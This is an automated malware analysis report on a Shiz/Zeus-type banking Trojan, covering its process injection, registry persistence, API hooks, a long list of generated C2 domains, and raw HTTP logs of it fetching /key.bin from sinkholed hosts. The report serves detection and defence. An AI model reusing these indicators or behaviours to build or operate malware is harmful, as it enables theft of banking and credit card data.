Gen.Variant.Zusy.Elzob.8654_b9c91e6e54

by malwarelabrobot on October 30th, 2017 in Malware Descriptions.

HEUR:Backdoor.Win32.Generic (Kaspersky), Gen:Variant.Zusy.Elzob.8654 (B) (Emsisoft), Gen:Variant.Zusy.Elzob.8654 (AdAware), Backdoor.Win32.Shiz.FD, Shiz.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, BankerGeneric.YR (Lavasoft MAS)
Behaviour: Banker, Backdoor

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: b9c91e6e540274fb4c32e2359947f11a
SHA1: 976d6625fde7531b16e9112486705a5af7c80a84
SHA256: 4d99339b48b0e668802a972f065cfce4280b531f17fe82d9d3e9e16c2126f63f
SSDeep: 6144:Wu kBmWicfSPyXTnkl r MHLt8TaggWQI9T1S0osk:WAmWip2TnGC MHL2mgiIF1S0
Size: 366080 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company:
Created at: 2011-10-01 20:32:05
Analyzed on: Windows7 SP1 32-bit

Summary:

Banker. Steals data relating to online banking systems, e-payment systems and credit card systems.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1504

The Trojan injects its code into the following process(es):

winlogon.exe:416
svchost.exe:580
svchost.exe:648
svchost.exe:700
svchost.exe:824
svchost.exe:864
taskhost.exe:872
svchost.exe:1048
svchost.exe:1156
svchost.exe:1280
Dwm.exe:1376
Explorer.EXE:1440
svchost.exe:1732
TPAutoConnect.exe:2160
conhost.exe:2168
svchost.exe:2560
conhost.exe:3500

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\config\SOFTWARE.LOG1 (11529 bytes)
C:\Windows\System32\config\SOFTWARE (13651 bytes)
C:\Windows (4 bytes)
C:\Windows\AppPatch\rkousid.exe (2837 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\59B4.tmp (0 bytes)

Registry activity

The process %original file name%.exe:1504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"10f5f7ed" = "YM3&}=Ã¢â‚¬â€ZÃƒÂ®ÃƒÅ¡Ã‚Â¹Ã‚ÂÃ‚ÂªÃƒÂ¡Z`eÃƒâ€¡h:UDÃ…Â >ÃƒÂ¼ÃƒÂ¾{ÃƒÂ²:Ãƒâ€™ÃƒÂ£Ã‚Â¬Ã¢â‚¬Å“Ã…Â¡Ã‚Â²Ã‚Â©#ÃƒÂº;Ã‚Â³Ã‚Â³Ãƒâ€˜Ã…Â¡qr{Ã‚Â¬Ã‚Â´3A#jÃ†â€™2r Ãƒâ„¢9Ãƒâ€šÃ‚Â².Ã‚Â²ÃƒÆ’tÃ¢â‚¬Å¡Ã‚Â¾sÃƒÂºÃ…Â¾Ãƒâ€š2Ã‚Â¡DÃ¢â‚¬â„¢*Ã…â€™Ãƒâ€ºDÃƒÂ¶Ã‚Â¶Ã‚Â¬Ã†â€™j~Ã…Â¾2Ã¢â‚¬ÂºÃ‚Â©Ã‚ÂÃ…Â¡Ã¢â‚¬â„¢ Ã¢â‚¬â„¢ÃƒÂ®#nNÃ‚Â¬dLRÃƒâ€ºÃ‚Â«jÃ‚Â¢avÃƒÅ“d~Ã¢â‚¬ÂºÃ…Â CÃƒÂ²6Ãƒâ€šÃƒâ€¹Ã¢â‚¬Â¹SÃ‚Â±ÃƒÂ£RÃ‚Â«9Ã‚Â±iÃƒÂ¹,Ã‚Â©Ãƒâ€“Ã…Â Ãƒâ€°Ã…Â ÃƒÂVÃ¢â‚¬Å¡BÃ¢â‚¬Å¡Ã…Â½Ã…Â¾Ã‚Â¹ÃƒÂªÃƒÅ ~ÃƒÅ |[ÃƒÂ«Ã‚ÂºÃ¢â‚¬ÂºACÃ¢â‚¬Â¹ÃƒÂ¹ÃƒÂ©ÃƒÂ¬>aÃƒâ€ ÃƒÂ¢Ã¢â‚¬ËœÃ‚Â¤Ãƒâ„¢{Ã‚Â²ÃƒÂ¢Ã†â€™i Ã¢â€žÂ¢Ãƒâ€™RKfÃ¢â‚¬Â¹Ã‚Â¾ÃƒÂ»ÃƒÅ’ÃƒÂºBÃ¢â€žÂ¢Ã…Â Ã¢â‚¬Å¡cNÃ‚Â¾;Ã†â€™ÃƒÂ¼ÃƒÂÃƒâ€˜DZÃ‚Â©4Fd1Ã¢â‚¬Å“[Ã…â€™Ãƒâ€¹ÃƒÅ Ã‚Â±ÃƒÂ¹Ã‚Â«i AÃ¢â‚¬â„¢ÃƒÂ£Ã†â€™jÃƒâ€¹ Ã¢â‚¬Â°Ã¢â‚¬Â ÃƒÂ¼Ãƒâ€œÃƒÂ¡sÃƒÂ±Q."

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ose00000.exe, , \??\C:\Windows\apppatch\rkousid.exe_, \??\C:\Windows\apppatch\rkousid.exe"

Dropped PE files

MD5	File path
d3597c940986dcd3006a6e1842eb809f	c:\Windows\AppPatch\rkousid.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following user-mode hooks in USER32.dll:

GetClipboardData
GetMessageW
TranslateMessage
GetMessageA
SetThreadDesktop

The Trojan installs the following user-mode hooks in ntdll.dll:

ZwQuerySystemInformation

Propagation

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	10772	11264	4.1629	fc0cd423f3f881a1185bb93dc30c0ae4
.rdata	16384	6854	7168	4.09717	526aed65adee6062a4e8fcd112ec97d5
.data	24576	358948	344064	4.69085	3a9bf21e68fab6de8397ac481ecc0134
.reloc	385024	2426	2560	2.26235	d1f6091abe33d1cf8411d933a5d13ecc

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 3
b592848c6a8ae7b2fdca9bae1953384c
bcf3331a7355038fb176d96dc6553ee4
b39ea4f79232adb9949bb61cee025813

URLs

URL	IP
hxxp://halybowu.info/key.bin	23.253.126.58
hxxp://jevijexi.info/key.bin	198.54.117.212
hxxp://wycokolo.info/key.bin	141.8.224.93
hxxp://qekenivo.info/key.bin	23.253.126.58
hxxp://masyfoti.info/key.bin	23.253.126.58
hxxp://halakuha.info/key.bin	23.253.126.58
hxxp://lysugiro.info/key.bin	23.253.126.58
hxxp://navotocu.info/key.bin	23.253.126.58
hxxp://bonacamy.info/key.bin	23.253.126.58
hxxp://foxihazo.info/key.bin	23.253.126.58
hxxp://fobirebu.info/key.bin	23.253.126.58
hxxp://ryderule.info/key.bin	23.253.126.58
hxxp://mamawufo.info/key.bin	23.253.126.58
hxxp://xutikexy.info/key.bin	23.253.126.58
hxxp://gacehawy.info/key.bin	23.253.126.58
hxxp://kericura.info/key.bin	23.253.126.58
hxxp://xudohijy.info/key.bin	23.253.126.58
hxxp://sikuvosy.info/key.bin	23.253.126.58
hxxp://xuxelixi.info/key.bin	23.253.126.58
hxxp://dixoxywy.info/key.bin	23.253.126.58
hxxp://gaqycyzu.info/key.bin	23.253.126.58
hxxp://mavagyte.info/key.bin	23.253.126.58
hxxp://zubisoda.info/key.bin	23.253.126.58
hxxp://nofipymo.info/key.bin	141.8.224.93
hxxp://xuxafery.info/key.bin	23.253.126.58
hxxp://rycikoga.info/key.bin	23.253.126.58
hxxp://viwemata.info/key.bin	23.253.126.58
hxxp://jeperedi.info/key.bin	23.253.126.58
hxxp://zyrivuro.info/key.bin	23.253.126.58
hxxp://naselyfu.info/key.bin	23.253.126.58
hxxp://rydofale.info/key.bin	23.253.126.58
hxxp://kyfawoxa.info/key.bin	23.253.126.58
hxxp://masewyky.info/key.bin	23.253.126.58
hxxp://zusuhiri.info/key.bin	23.253.126.58
hxxp://xubusore.info/key.bin	141.8.224.93
hxxp://kefywiri.info/key.bin	23.253.126.58
hxxp://gatofusi.info/key.bin	23.253.126.58
hxxp://typihyqa.info/key.bin	23.253.126.58
hxxp://sivydubu.info/key.bin	23.253.126.58
hxxp://wekanila.info/key.bin	23.253.126.58
hxxp://rycukope.info/key.bin	23.253.126.58
hxxp://lyvamyda.info/key.bin	23.253.126.58
hxxp://fobefizi.info/key.bin	23.253.126.58
www.bing.com	204.79.197.200
pujejygy.info
maraxiku.info
doguneze.info
ryqokilu.info
jefycyxe.info
gahenyhe.info
fogytibo.info
wycyqaga.info
jejozoxa.info
dimaxesa.info
zybasixi.info
bozujity.info
dokovoza.info
xukuhuru.info
masawyfu.info
ryhyciqi.info
wybonugo.info
magisumi.info
lyrusura.info
wycisyqu.info
qesofoly.info
pupipaly.info
digineba.info
cilicaco.info
golevobi.info
maxyjomu.info
doxotuha.info
hacyhasa.info
navegyfa.info
viluceka.info
disemube.info
fokyvowu.info
rydobaqo.info
fokakyhe.info
dixytubi.info
nagamamo.info
lyzeluxi.info
lykuguru.info
wederuly.info
welyfopu.info
xudipyna.info
rycedylo.info
goqoxywe.info
tupypopo.info
cinydota.info
sizutuwu.info
xudunodu.info
pufetule.info
sisysasi.info
sizaxyse.info
foxytubi.info
cicaroci.info
lyzulunu.info
qeqejivu.info
rycoqavi.info
foxituse.info
bovagyte.info
lyrosuji.info
ciwyzume.info
xuxyriry.info
nazojika.info
vinaqyfo.info
dibyviwy.info
tuwybegi.info
xuxofenu.info
bopaketo.info
fokuvosy.info
kyzydaja.info
vipukeky.info
kejizoje.info
navobyfa.info
xuxufexi.info
nasuwyma.info
pureloqa.info
maxasyfe.info
jevemeja.info
hawicywa.info
hatyfube.info
zymaluji.info
rylofola.info
kezolude.info
kymabony.info
bomicacu.info
galivoha.info
jecopijo.info
dikojysy.info
webanuli.info
foqiqiso.info
kefewono.info
qegoxugy.info
lykuxaje.info
cihurafy.info
pujowevo.info
cihivuti.info
vinocacu.info
ciluhitu.info
disojusi.info
pufyruva.info
novytote.info
simimisa.info
ryhaqeqi.info
rytopove.info
jecimenu.info
mavubumy.info
zutosiju.info
fobarewe.info
lysegixe.info
vinucaki.info
rydygapu.info
foqexyhi.info
hadideze.info
puvowavu.info
vilehico.info
simymiwe.info
wydafava.info
vopadice.info
zysitena.info
tuciduqy.info
xutukeju.info
kemuboda.info
sizatuhe.info
jenulyny.info
hadiqisi.info
pujuwela.info
hahyzosu.info
qeqikigo.info
dixetuzo.info
qesafove.info
ciqozufo.info
kezaluja.info
purubyly.info
masywyce.info
viherami.info
bopilece.info
puzogolo.info
lykomuru.info
halubose.info
qekulela.info
rynupago.info
makanika.info
cidonoce.info
jezeluxo.info
fosoqihu.info
viwezucy.info
zyxifexo.info
nagesuke.info
ryhoqevo.info
puzozyqu.info
wytypopo.info
namuwume.info
jecejery.info
galovozo.info
tunapaqe.info
kysigidi.info
ganeresa.info
ryqevepo.info
xulyxade.info
bozypeka.info
qekuniqu.info
rylezege.info
ryhocigy.info
bopodiky.info
hanireby.info
zusihidu.info
nofumafu.info
tupujyve.info
fobiviho.info
disumuwo.info
gahazobo.info
wetexive.info
jepazana.info
qekelege.info
sizegowu.info
jenibojo.info
bowezicy.info
lyjemyje.info
xugyvyxa.info
dobevibu.info
bowyzime.info
pujyjele.info
jewyjado.info
dobyweho.info
jefocero.info
puradygi.info
wequvelu.info
qekofila.info
sizigazo.info
marexice.info
namevata.info
fobewesa.info
pumemivy.info
hapaguhu.info
sizexyha.info
citodiku.info
vilepefy.info
sijujybo.info
gaqoqohi.info
magimake.info
bopiwyma.info
foqahoby.info
makileco.info
tujicigy.info
qetetoqe.info
dikevobi.info
hahozoza.info
gacopuha.info
fohizohy.info
jewycyxy.info
najuleke.info
wekifige.info
bocaroci.info
kyficyri.info
vidinoky.info
jewecuju.info
kyjexaru.info
puwobeqa.info
bomawufo.info
bojolami.info
welizevo.info
bopydoto.info
hahonywi.info
magyxumo.info
qetotovy.info
xutisidi.info
kefacydu.info
haparawa.info
dikejyhe.info
magasufy.info
kemalyjo.info
sividuwy.info
ryninupe.info
vicugyci.info
gatozazy.info
galukubi.info
bowegefo.info
jenyreji.info
kemutyxu.info
tunopavy.info
disijuwo.info
hanarewe.info
goquhohi.info
sisyjuze.info
zubosojo.info
gobyviwy.info
bovubymu.info
novugycu.info
pupopave.info
zukexaru.info
tufuruqo.info
qegeqapu.info
kymolyda.info
fotifuwa.info
pufotugy.info
jefuwidu.info
direfyzu.info
rycudyvi.info
simyxezi.info
gahezowi.info
xuqazuji.info
ciciroko.info
kyjymyxo.info
fohonewi.info
xuhovudy.info
sivefuzi.info
bonecate.info
hacupiwy.info
divafuho.info
gacipuse.info
bofopyti.info
jezadaru.info
lyxuwide.info
bopewyku.info
zymynora.info
qebitali.info
xuqunado.info
doxehawy.info
jeludaje.info
xutusira.info
narygeku.info
mamewuki.info
bonywucu.info
xudyhino.info
zuqonaxu.info
fokivohe.info
zuxylinu.info
sirodyso.info
xubeqyjo.info
siridywa.info
webutago.info
lyxaluja.info
rywukipa.info
webypapa.info
wedarugu.info
sisosaba.info
cibycofa.info
puvawaqy.info
vofemoti.info
kevamede.info
zuqanone.info
viwageta.info
jefucyna.info
ryceqapy.info
wequkipa.info
ciqonacy.info
xubasoxu.info
hawuhahi.info
vifipymo.info
vilopetu.info
doquxyby.info
wylyzela.info
hahanysy.info
sigabesu.info
vipikece.info
fodosaba.info
golisaza.info
nazisymu.info
vihyratu.info
punezego.info
najelefy.info
mamyjimy.info
pufebepi.info
lyrisudo.info
narugecy.info
nojileco.info
puvuwalo.info
puzugoge.info
gohinebo.info
xuboqyre.info
rylafovo.info
dobufuwe.info
sizitusy.info
dibuwezi.info
digonewi.info
cilecaty.info
lyvumexi.info
xuhikaxa.info
jepuguro.info
mazysyka.info
zubyqyxi.info
lyrovudi.info
fobuvisa.info
tunomigo.info
disusahu.info
siviviha.info
vilyhimi.info
siryfyby.info
vopekefu.info
cihykafu.info
mamavame.info
hapezawo.info
jejamydy.info
hafydehy.info
gabyreho.info
jefededu.info
vinoqyte.info
vojibutu.info
lyzafery.info
xuxuride.info
makaletu.info
jewejara.info
gotezawo.info
qeqywuvy.info
xuhevyje.info
vihobufy.info
jevupiry.info
gaqehowe.info
godusehy.info
goxyhase.info
qexisyqu.info
zygewono.info
bowygeki.info
kewacudo.info
bowomacy.info
lymulyny.info
kefydeje.info
tulegoqu.info
jeneryda.info
fodisaze.info
xubaxonu.info
foxahabi.info
maregefi.info
bovigymy.info
fodiqisi.info
lyrejara.info
vicurofe.info
jejezori.info
digulisu.info
magomaca.info
wyqakivy.info
viwazuku.info
bopidofi.info
ryduruqo.info
qetyxiqa.info
kejeguxa.info
bojabuka.info
lymilyre.info
kyvosijo.info
dokijywu.info
zusytejy.info
xudinojy.info
hacuhaho.info
rytehygu.info
gotafuhu.info
qequwuqe.info
zyxywiry.info
jejumyxa.info
mazujity.info
qedyruve.info
maryxima.info
wexiqolo.info
nozopety.info
wehyqagy.info
hacihazi.info
rywobeqe.info
rycaduga.info
teredo.ipv6.microsoft.com
tunyzeli.info
qexikoga.info
ganovizi.info
ciwinaku.info
fobyfiby.info
rytepoqa.info
rywikigi.info
navetomy.info
vipedima.info
rynazepe.info
kepitena.info
qesuwyqa.info
puwudyvy.info
xukuxaja.info
zugivyri.info
bofypyke.info
tufybagu.info
wedyfopi.info
tywykiqe.info
cicerimu.info
xugurody.info
kejomyru.info
diruloso.info
bocegyfa.info
doralobe.info
puwedylu.info
rydebapi.info
wylefoqi.info
pupojypi.info
kejyxody.info
nasowyto.info
sijaciza.info
gatyrahu.info
divowebu.info
vicogemu.info
dogeliwo.info
namywucy.info
magosutu.info
sifitisu.info
pufibeva.info
hawecyhi.info
disisazy.info
fotolozy.info
xuxorija.info
qexusyvi.info
qebunuqy.info
rypohypo.info
hafeqiba.info
foxuhaha.info
citykefi.info
cinidofo.info
tycodupe.info
vidopyti.info
fogynehy.info
dirafyhi.info
jepogudi.info
kefecyjy.info
puveduli.info
lykoxaxa.info
jejemyje.info
dosesasi.info
qebetaqy.info
gadesesu.info
tyfibava.info
zurasixy.info
najubumi.info
nagoxufu.info
sigutiwi.info
lyjogudy.info
lyzedede.info
jezukuni.info
xuhyroru.info
divuvise.info
zuxawixo.info
lyvesiny.info
weqivevy.info
jewojane.info
sijivohe.info
kejimyni.info
wetupogi.info
mamuvaki.info
kevypinu.info
gacohabu.info
qekefiqi.info
marihema.info
zuqoludo.info
sigybehy.info
zuxiliry.info
hanibiho.info
tujujevo.info
haladawu.info
zykehuxa.info
wyticogu.info
zybomyre.info
mavutofa.info
rynopavu.info
lygowojy.info
puzetula.info
galedasy.info
dorofuso.info
halykuzo.info
lykyguno.info
zygavydu.info
tyhecivo.info
gaquqoso.info
dimemiby.info
jelikuru.info
puzazypy.info
jenoryre.info
sifubeze.info
zugiwoje.info
rywibevy.info
gatazabe.info
ryhuqela.info
tyfegaqo.info
makolemi.info
zyrysine.info
bozuceko.info
bofomoca.info
magexuca.info
hapyzasi.info
hadyqiwo.info
magixuti.info
kyzilury.info
bofapyfu.info
maxosyty.info
kezidaxo.info
volipemi.info
dimamizu.info
nazusyco.info
galikywu.info
puwilogi.info
nafaxuky.info
zusanona.info
sisimusi.info
qegaqaqi.info
fotefuzy.info
citidifi.info
viwogeme.info
zuguvyno.info
sizyxyzo.info
sirolozu.info
zysahijy.info
qekalepy.info
gaqyhosa.info
rydufagy.info
bozupeco.info
hacapizi.info
magymafy.info
tyfarugy.info
foqehowe.info
wehyxiqo.info
zuryjadi.info
jenoboxu.info
sirabyso.info
jefaderi.info
kezodani.info
tujijeqi.info
lysygina.info
citaketo.info
kefidexa.info
lyvisida.info
fosasawo.info
rylozyqu.info
lygevyjy.info
qexesylo.info
xudetedu.info
weqykiqe.info
kemylyxi.info
siralobe.info
zusynoro.info
zyrujaju.info
bojybuco.info
xuqenara.info
sirybyhi.info
zykyxady.info
cidynoto.info
zusutexe.info
zukaxani.info
tynozeqy.info
vihikaca.info
wekozeqi.info
sisajuhu.info
jecipide.info
xutokene.info
puwulopo.info
fogoloze.info
pupejygu.info
hanubosa.info
pumoxeqe.info
simomiho.info
fogutiwi.info
vowugecy.info
xuboxoxi.info
wexakovi.info
ciwefafo.info
xutesine.info
viwunafi.info
cicafety.info
cihakati.info
cidypyky.info
hateraso.info
xulehuxo.info
wyheqapu.info
qedufogu.info
tujeqepu.info
puvaduga.info
wehiqale.info
kemybore.info
mabanuko.info
nomucaki.info
tufirupi.info
lyrojane.info
vonuqumy.info
cinacamy.info
bozyjimu.info
hacypibu.info
naruxito.info
qeqyvego.info
goxepuzo.info
lyrijaxy.info
qesowypi.info
nafemati.info
voceromu.info
cidanoma.info
dibofusa.info
fokosabo.info
puzuxyvi.info
tylizyvi.info
cihuvumo.info
jepurexy.info
zukahuje.info
zuxewini.info
namycafo.info
tujaweqi.info
gatufuwa.info
fodyqiwo.info
masifofu.info
fohatiza.info
vonycafa.info
vihokamo.info
fokykyza.info
dosaquzy.info
mabytate.info
webynuvu.info
nazijife.info
fotyzasi.info
lygywori.info
volecety.info
hapeguzy.info
hahizohe.info
tucewape.info
kepagiju.info
kevomery.info
lyguwodu.info
hanurezu.info
ciqizuta.info
ciqaname.info
makybico.info
gohuzosu.info
bojubumi.info
navygyki.info
goqaqozu.info
qegoqava.info
wyduvaly.info
zuqilura.info
dogitisu.info
naroxifi.info
wetihyqa.info
rycaqaqu.info
rytyhyly.info
hanybowe.info
pujecivo.info
noraxiku.info
doqoqihi.info
tujacila.info
golokysy.info
gabevibu.info
wyhacile.info
jecumexi.info
jezedady.info
wexoqovi.info
lymoboxu.info
mamijifo.info
halodabi.info
simexeho.info
jefowijy.info
wetaxoly.info
kymytyji.info
citasicy.info
rynenuvu.info
lyxofenu.info
hawacyso.info
foqeqoby.info
sivewase.info
tyciqalo.info
xudonoxe.info
qeqokili.info
qexukope.info
lyrevuju.info
kysutexy.info
halokusy.info
zuxyfeja.info
maxajoci.info
jefodeno.info
nojobufy.info
mavynuci.info
sivywaha.info
vopoqyto.info
wexykoqy.info
pujyciqi.info
cinyqycu.info
lykamydy.info
xuherono.info
fotyfube.info
cicefefa.info
xubaqyda.info
kevapixi.info
tuwidyqe.info
hawihozu.info
qeguxupu.info
sisomuhu.info
sisamuzy.info
cinecote.info
tufubale.info
kepegixe.info
novebyko.info
volojika.info
kemityny.info
cilacami.info
lygyvyxe.info
zukihudy.info
gaqucyby.info
mamujita.info
vipudito.info
pufobeqo.info
jenebony.info
gadaqize.info
tylygopy.info
halidazo.info
kewijaxy.info
gadadewo.info
lyjaxani.info
jepyguna.info
tunimipa.info
gadoqihy.info
rynunuqy.info
simixeby.info
bojalatu.info
qeroxigi.info
sisasawo.info
kepatero.info
lymeluxu.info
xuquluny.info
foganesu.info
dixugaha.info
nozejici.info
xukyhuni.info
xubesony.info
jepyreju.info
qebotavu.info
zuxefede.info
zugawoxa.info
hawahoby.info
boziceci.info
hacomewy.info
vocygyko.info
nasodoky.info
rylugoge.info
wybapaqy.info
nomowuta.info
vihebuke.info
tynypapa.info
fotilohu.info
jewucyne.info
cicyfeko.info
sikyjyza.info
tulyzylo.info
qeqevepa.info
vofupyca.info
foqaxyso.info
goburezi.info
tucyduvu.info
bonewuki.info
lyryvuxy.info
qekinipy.info
bofamomo.info
qetyhylu.info
sijijywi.info
kyjaguje.info
tyhahepu.info
typupogi.info
xuqinaji.info
rypipoly.info
lyvusire.info
zubiqynu.info
lyguvyno.info
xudehixe.info
xukoxaxo.info
nopawyfi.info
bopolema.info
sirilohi.info
sisujuba.info
bovutofa.info
qebonuga.info
wetahypo.info
nofexuce.info
nafusyca.info
nasadoce.info
nopuleky.info
ryhucipu.info
bofimaky.info
kyrucune.info
navibute.info
galusahe.info
kyvimenu.info
qeqoveqe.info
najibutu.info
hadodeba.info
cineqyki.info
cihybuca.info
dimoxywe.info
zutakaro.info
lymunodo.info
tunizevu.info
lysyteju.info
tucyqaga.info
vojukake.info
puzytyvi.info
lymetydo.info
fogaliba.info
tyhyqege.info
wytuhyve.info
bopywyce.info
citokema.info
tuzezyga.info
bowageta.info
digetize.info
jecojenu.info
mamiwuta.info
qetehygi.info
hapirabe.info
sizagobi.info
pumazepa.info
zyxolide.info
gahunyza.info
foxutuwu.info
cihukake.info
qexojolo.info
bovybyci.info
fobavizi.info
pujojypu.info
godeqiba.info
marageto.info
wetitolu.info
tuwokolu.info
nopedoma.info
qekafivo.info
direlowa.info
rynipali.info
masefomo.info
foqyqowa.info
makonife.info
dikyvowu.info
cidupyce.info
boviroko.info
tupyjyly.info
rydyruva.info
tupapaqa.info
bowizita.info
tuwakovy.info
tynamili.info
pupupagu.info
digotihy.info
punumiqe.info
tuzagovi.info
dixyhase.info
xuqezuxu.info
xudotyri.info
cilahika.info
wyqyvegi.info
vowozufo.info
sigytibo.info
qebinupe.info
lysetedi.info
zuruvuna.info
dosujuba.info
vifumofu.info
cibiqymy.info
tuwabepo.info
qegaxule.info
mavitoko.info
vicyroty.info
puvodupe.info
qetuxipo.info
wydirupi.info
makyfitu.info
ciharoca.info
bojykafy.info
cihiroke.info
xubuxojo.info
vowamame.info
cibosoki.info
bozijife.info
lysotero.info
hatizahu.info
bozacemu.info
ciqyfaki.info
cilihife.info
jejazono.info
puzygopy.info
puwibyve.info
jefaqixe.info
rynezega.info
vilycefe.info
hahimybo.info
mamivacu.info
gohopihe.info
sivawawy.info
foqihozu.info
fokukybo.info
wexasyga.info
wedefoqo.info
pupijuqo.info
pumamilu.info
tywubelu.info
bozapefe.info
wexosype.info
norogeme.info
foqyxyzu.info
wehexiva.info
cidapyfu.info
cidihifu.info
pujucipu.info
hacanese.info
rydyvagu.info
kyryjado.info
kerujaji.info
lyvemyjo.info
qeruhevy.info
rylazypy.info
lymiboji.info

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY Unsupported/Fake Windows NT Version 5.0
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 2.
ET CNC Zeus Tracker Reported CnC Server group 4

Traffic

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: jeperedi.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:04 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: mavagyte.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: lyvamyda.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:59 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: kyfawoxa.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:46 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rycikoga.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: kefywiri.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:51 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: zyrivuro.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:12 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: rycukope.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:11:13 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: kyfawoxa.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:46 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: zusuhiri.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:21 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: bonacamy.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

Date: Sun, 29 Oct 2017 17:10:59 GMT

X-Malware-Sinkhole: Arbor Networks

Connection: close

GET /key.bin HTTP/1.1

Referer: hXXp://VVV.google.com

User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30728; Media Center PC 6.0)

Host: navotocu.info


HTTP/1.1 404 Not Found

Server: nginx 1.1.19

